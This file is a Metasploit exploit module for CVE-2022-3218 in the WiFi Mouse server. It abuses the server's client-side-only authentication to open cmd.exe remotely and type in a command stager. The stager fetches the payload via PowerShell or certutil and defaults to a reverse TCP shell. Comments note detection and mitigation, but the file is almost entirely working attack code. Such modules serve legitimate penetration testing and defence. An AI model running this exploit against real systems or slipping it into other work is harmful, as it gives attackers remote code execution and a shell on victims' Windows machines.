##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
# Exploit module for the WiFi Mouse (Mouse Server) client-side-only authentication
# weakness (CVE-2022-3218): the server accepts plaintext `openfile` / `utf8` / `key`
# messages over TCP without any server-side check, so a command prompt can be
# opened and a CmdStager payload typed into it.
#
# Detection / mitigation notes (from what this module sends): every message is
# plaintext on the service port (default 1978), so `openfile ` and `utf8 ` lines
# are directly matchable on the wire, and the typed stager lands on disk
# (ARTIFACTS_ON_DISK) and on screen (SCREEN_EFFECTS). Limiting network reachability
# of the service port removes the exposure entirely.
class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Exploit::Remote::Tcp
  include Msf::Exploit::CmdStager

  # Registers module metadata and options.
  #
  # Options (read back via datastore[...] in the helpers below):
  # - RPORT   : service port (default 1978)
  # - SLEEP   : seconds to pause between typed lines and after opening cmd.exe
  # - LINEMAX : maximum stager line length handed to execute_cmdstager
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Wifi Mouse RCE',
        'Description' => %q{
          The WiFi Mouse (Mouse Server) from Necta LLC contains an auth bypass as the
          authentication is completely implemented entirely on the client side. By utilizing
          this vulnerability, is possible to open a program on the server
          (cmd.exe in our case) and type commands that will be executed as the user running
          WiFi Mouse (Mouse Server), resulting in remote code execution.

          Tested against versions 1.8.3.4 (current as of module writing) and
          1.8.2.3.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'h00die', # msf module
          'REDHATAUGUST', # edb
          'H4RK3NZ0' # edb, original discovery
        ],
        'References' => [
          [ 'EDB', '50972' ],
          [ 'EDB', '49601' ],
          [ 'CVE', '2022-3218' ],
          [ 'URL', 'http://wifimouse.necta.us/' ],
          [ 'URL', 'https://github.com/H4rk3nz0/PenTesting/blob/main/Exploits/wifi%20mouse/wifi-mouse-server-rce.py' ]
        ],
        'Arch' => [ ARCH_X64, ARCH_X86 ],
        'Platform' => 'win',
        'Targets' => [
          [
            'stager',
            {
              'CmdStagerFlavor' => ['psh_invokewebrequest', 'certutil']
            }
          ],
        ],
        'Payload' => {
          # \x0A terminates each `utf8` message (see send_command), so it can never
          # appear inside a typed line; \x00 is excluded alongside it.
          'BadChars' => "\x0a\x00"
        },
        'DefaultOptions' => {
          # since this may get typed out ON SCREEN we want as small a payload as possible
          'PAYLOAD' => 'windows/shell/reverse_tcp'
        },
        'DisclosureDate' => '2021-02-25',
        'DefaultTarget' => 0,
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [REPEATABLE_SESSION],
          'SideEffects' => [SCREEN_EFFECTS, ARTIFACTS_ON_DISK] # typing on screen
        }
      )
    )
    register_options(
      [
        OptPort.new('RPORT', [true, 'Port WiFi Mouse Mouse Server runs on', 1978]),
        OptInt.new('SLEEP', [true, 'How long to sleep between commands', 1]),
        OptInt.new('LINEMAX', [true, 'Maximum length of lines to send for stager method. Smaller for more unstable connections.', 1_020]),
      ]
    )
  end

  # Sends the Return key-press message. `sock` is the TCP socket opened by
  # `connect` in #exploit; the message is written as-is, no framing or newline.
  def send_return
    sock.put('key 3RTN') # what the mobile app sends
  end

  # Types `command` as a single `utf8` message (newline-terminated), waits
  # datastore['SLEEP'] seconds for the remote side to render it, then presses
  # Return so the line is executed by whatever window has focus.
  #
  # @param command [String] one line of text to type; must not contain \x0A
  def send_command(command)
    sock.put("utf8 #{command}\x0A")
    sleep(datastore['SLEEP'])
    send_return
  end

  # Asks the server to open a file by path.
  #
  # The Windows path is rewritten into the form the `openfile` message takes:
  # a leading '/', backslashes replaced by '/', and the drive colon removed,
  # e.g. 'C:\Windows\System32\cmd.exe' -> '/C/Windows/System32/cmd.exe'.
  #
  # @param file [String] Windows path of the program to open
  def open_file(file)
    file = "/#{file}".gsub('\\', '/').gsub(':', '')
    sock.put("openfile #{file}\x0A")
  end

  # Main flow: connect, open cmd.exe, give it SLEEP seconds to appear, then let
  # the CmdStager mixin type the payload line by line (each line goes through
  # #execute_command) and start the handler.
  #
  # NOTE(review): `connect` has no matching `disconnect`/`ensure` here, so the
  # socket is left to the framework's cleanup — confirm that is intended.
  def exploit
    connect
    print_status('Opening command prompt')
    open_file('C:\\Windows\\System32\\cmd.exe')
    sleep(datastore['SLEEP']) # give time for it to open

    print_status('Typing out payload')
    # linemax caps each typed line; delay reuses SLEEP between lines.
    execute_cmdstager({ linemax: datastore['LINEMAX'], delay: datastore['SLEEP'] })

    handler
  end

  # Callback used by the CmdStager mixin for every stager line; `_opts` is
  # accepted for interface compatibility and intentionally unused.
  #
  # @param cmd [String] one stager line to type
  def execute_command(cmd, _opts = {})
    send_command(cmd)
  end
end